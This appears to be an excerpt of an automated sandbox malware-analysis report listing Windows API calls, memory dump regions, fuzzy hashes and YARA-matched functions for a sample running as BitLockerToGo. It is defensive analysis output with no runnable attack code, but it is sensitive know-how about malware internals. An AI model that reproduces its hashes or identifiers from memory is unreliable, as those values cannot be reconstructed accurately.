                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CCD778F,00000000,00000000,00000000,00000000), ref: 6CCD7731
                                                                                                                                                                • free.MOZGLUE(00000000), ref: 6CCD7760
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2538299546-0
                                                                                                                                                                • Opcode ID: e3353d22d2b3de0aa7f4f230fdbb607a7d7536655cb4df68f9010bd21c68c4ae
                                                                                                                                                                • Instruction ID: 15c1acb14d48cddc16ac47741176e50f9de011ecabb6aec8956e788b7a0d4c94
                                                                                                                                                                • Opcode Fuzzy Hash: e3353d22d2b3de0aa7f4f230fdbb607a7d7536655cb4df68f9010bd21c68c4ae
                                                                                                                                                                • Instruction Fuzzy Hash: C31190B1901215ABE710AF669C44AABBEE8FF46354F05492AE848A7200F7719850C7E2
                                                                                                                                                                APIs
                                                                                                                                                                • StrStrA.SHLWAPI(03556018,?,?,?,0301140C,?,03556018,00000000), ref: 0301926C
                                                                                                                                                                • lstrcpyn.KERNEL32(0324AB88,03556018,03556018,?,0301140C,?,03556018), ref: 03019290
                                                                                                                                                                • lstrlen.KERNEL32(?,?,0301140C,?,03556018), ref: 030192A7
                                                                                                                                                                • wsprintfA.USER32 ref: 030192C7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                • String ID: %s%s
                                                                                                                                                                • API String ID: 1206339513-3252725368
                                                                                                                                                                • Opcode ID: 149ffbec69718cd24a4c4c921446b4b86acc5cb28a4a92e08988858867e4b54b
                                                                                                                                                                • Instruction ID: b439285fe58d9078001df21fff0d4168e636142e2457e458fa15dfa753619048
                                                                                                                                                                • Opcode Fuzzy Hash: 149ffbec69718cd24a4c4c921446b4b86acc5cb28a4a92e08988858867e4b54b
                                                                                                                                                                • Instruction Fuzzy Hash: D7011A79550208FFCB04DFECD998EAE7BB9EB48394F108148F9098B205C731AA50CB90
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CC73DEF), ref: 6CCB0D71
                                                                                                                                                                • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CC73DEF), ref: 6CCB0D84
                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CC73DEF), ref: 6CCB0DAF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Free$Alloc
                                                                                                                                                                • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                • API String ID: 1852963964-2186867486
                                                                                                                                                                • Opcode ID: 0842e47b2fb201b7781e9f51219b5e886f02989dd887a535c36caeb56bbca1c7
                                                                                                                                                                • Instruction ID: 4f59caf1207fc02dc7657abca79abce6f68a3f818630736728c11cde5385c79c
                                                                                                                                                                • Opcode Fuzzy Hash: 0842e47b2fb201b7781e9f51219b5e886f02989dd887a535c36caeb56bbca1c7
                                                                                                                                                                • Instruction Fuzzy Hash: B7F05BA138075823E55013F65F16B96266D7FC1B55F344065F225EEDC0FB70E4054665
                                                                                                                                                                APIs
                                                                                                                                                                • __getptd.LIBCMT ref: 0301C74E
                                                                                                                                                                  • Part of subcall function 0301BF9F: __getptd_noexit.LIBCMT ref: 0301BFA2
                                                                                                                                                                  • Part of subcall function 0301BF9F: __amsg_exit.LIBCMT ref: 0301BFAF
                                                                                                                                                                • __getptd.LIBCMT ref: 0301C765
                                                                                                                                                                • __amsg_exit.LIBCMT ref: 0301C773
                                                                                                                                                                • __lock.LIBCMT ref: 0301C783
                                                                                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0301C797
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 938513278-0
                                                                                                                                                                • Opcode ID: 72a2329b35ef0d7a3eb154046c4c8ce6881bebad3ef9ee8df5704d258e4b496f
                                                                                                                                                                • Instruction ID: 608b538c2e4fd94a6a8b2bedb2b60f462c284e1a120adea96973b33880364e2b
                                                                                                                                                                • Opcode Fuzzy Hash: 72a2329b35ef0d7a3eb154046c4c8ce6881bebad3ef9ee8df5704d258e4b496f
                                                                                                                                                                • Instruction Fuzzy Hash: B6F09077A877109FE761FBF8540579E77E06F80724F24414DE014AF1D0CFA899608B56
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CCACBE8: GetCurrentProcess.KERNEL32(?,6CC731A7), ref: 6CCACBF1
                                                                                                                                                                  • Part of subcall function 6CCACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC731A7), ref: 6CCACBFA
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CCAD1C5), ref: 6CC9D4F2
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CCAD1C5), ref: 6CC9D50B
                                                                                                                                                                  • Part of subcall function 6CC7CFE0: EnterCriticalSection.KERNEL32(6CCFE784), ref: 6CC7CFF6
                                                                                                                                                                  • Part of subcall function 6CC7CFE0: LeaveCriticalSection.KERNEL32(6CCFE784), ref: 6CC7D026
                                                                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CCAD1C5), ref: 6CC9D52E
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFE7DC), ref: 6CC9D690
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CCAD1C5), ref: 6CC9D751
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                • String ID: MOZ_CRASH()
                                                                                                                                                                • API String ID: 3805649505-2608361144
                                                                                                                                                                • Opcode ID: e71038acf6ce6ad11c401b9516660dec1d3e9ae00deec38673a5669c50b181b4
                                                                                                                                                                • Instruction ID: 0bebfe903d0c31bae29ad87bfec77e11835c56445c02b0519ef85f9ee13817c3
                                                                                                                                                                • Opcode Fuzzy Hash: e71038acf6ce6ad11c401b9516660dec1d3e9ae00deec38673a5669c50b181b4
                                                                                                                                                                • Instruction Fuzzy Hash: 2451F171A047458FE354CF28C09475AB7F2EF89304F248A2ED5AAD7B84E771E801CB92
                                                                                                                                                                APIs
                                                                                                                                                                • __aulldiv.LIBCMT ref: 6CCC4721
                                                                                                                                                                  • Part of subcall function 6CC74410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CCB3EBD,00000017,?,00000000,?,6CCB3EBD,?,?,6CC742D2), ref: 6CC74444
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                                                                • String ID: -%llu$.$profiler-paused
                                                                                                                                                                • API String ID: 680628322-2661126502
                                                                                                                                                                • Opcode ID: cff1d5f4e5e3ca716a7c3bff38d9f6a49bf0f4a1f09e4c4bc1238f7892cd8054
                                                                                                                                                                • Instruction ID: 5331b3ae0cfb909c5a8763cc3cd6a59acd6562b47e0d402d4d15fe2cf01be172
                                                                                                                                                                • Opcode Fuzzy Hash: cff1d5f4e5e3ca716a7c3bff38d9f6a49bf0f4a1f09e4c4bc1238f7892cd8054
                                                                                                                                                                • Instruction Fuzzy Hash: F5313971F042085FCB08CF6DE8956ADBBE6DB89314F15813DE8059BB41FB709805CB51
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CC74290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CCB3EBD,6CCB3EBD,00000000), ref: 6CC742A9
                                                                                                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CCCB127), ref: 6CCCB463
                                                                                                                                                                • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCCB4C9
                                                                                                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CCCB4E4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                • String ID: pid:
                                                                                                                                                                • API String ID: 1720406129-3403741246
                                                                                                                                                                • Opcode ID: 1c8abc37b2d61835921289bbc94538c2be6dc211dc0fc1ef7f15a63f696a3e70
                                                                                                                                                                • Instruction ID: 1345a436b437dadfb1685f147406686e997fe16c0e585c652541fa02a2aac6ea
                                                                                                                                                                • Opcode Fuzzy Hash: 1c8abc37b2d61835921289bbc94538c2be6dc211dc0fc1ef7f15a63f696a3e70
                                                                                                                                                                • Instruction Fuzzy Hash: 9D31D031B05208DBDB10DFE9D890AEEB7B5FF45318F540529D811A7E41E736A84ACBA2
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 03016663
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 03016726
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 03016755
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                • String ID: <
                                                                                                                                                                • API String ID: 1148417306-4251816714
                                                                                                                                                                • Opcode ID: bb570ce3eebadc216cdf78a3f4b2c681dd87a633146e24286b74ffff1faddeb1
                                                                                                                                                                • Instruction ID: dd87f48d130c36654cf9c7c07318fdbb5a787ecee1e564227802d06375c39281
                                                                                                                                                                • Opcode Fuzzy Hash: bb570ce3eebadc216cdf78a3f4b2c681dd87a633146e24286b74ffff1faddeb1
                                                                                                                                                                • Instruction Fuzzy Hash: 91312CB5D02218ABDB14EB90ED94FDEB778AF84310F408189E20A6A180DF746B59CF65
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCBE577
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CCBE584
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CCBE5DE
                                                                                                                                                                • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CCBE8A6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                • API String ID: 1483687287-53385798
                                                                                                                                                                • Opcode ID: 4c2d15162bc8f58b1fe2a919c6259a33019aa4b0d0780ce6e07261ae78cd9096
                                                                                                                                                                • Instruction ID: 368d3dee9e1d641f73639f14dec6a901a343708b2a143f83d417e052b2db8c67
                                                                                                                                                                • Opcode Fuzzy Hash: 4c2d15162bc8f58b1fe2a919c6259a33019aa4b0d0780ce6e07261ae78cd9096
                                                                                                                                                                • Instruction Fuzzy Hash: 43118B31A04658DFCB009F58D848B6EBBF8FF89768F01061DE9A557B50E770A806CBA5
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0301951E,00000000), ref: 03018D5B
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03018D62
                                                                                                                                                                • wsprintfW.USER32 ref: 03018D78
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateProcesswsprintf
                                                                                                                                                                • String ID: %hs
                                                                                                                                                                • API String ID: 769748085-2783943728
                                                                                                                                                                • Opcode ID: bd148e843224ac0622a8be308038d1e811b8c985942f865e371bfa826342470c
                                                                                                                                                                • Instruction ID: 3d4b6dd37492140d3186431bfcdbb5579d0ec20d3bbaa4c0fdfda8d00da6748e
                                                                                                                                                                • Opcode Fuzzy Hash: bd148e843224ac0622a8be308038d1e811b8c985942f865e371bfa826342470c
                                                                                                                                                                • Instruction Fuzzy Hash: 19E0ECB9A81208BFD710EB94F90EE6D7BB8EB44702F008195FE0997244DA719E109B95
                                                                                                                                                                APIs
                                                                                                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CCC0CD5
                                                                                                                                                                  • Part of subcall function 6CCAF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CCAF9A7
                                                                                                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CCC0D40
                                                                                                                                                                • free.MOZGLUE ref: 6CCC0DCB
                                                                                                                                                                  • Part of subcall function 6CC95E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC95EDB
                                                                                                                                                                  • Part of subcall function 6CC95E90: memset.VCRUNTIME140(6CCD7765,000000E5,55CCCCCC), ref: 6CC95F27
                                                                                                                                                                  • Part of subcall function 6CC95E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC95FB2
                                                                                                                                                                • free.MOZGLUE ref: 6CCC0DDD
                                                                                                                                                                • free.MOZGLUE ref: 6CCC0DF2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
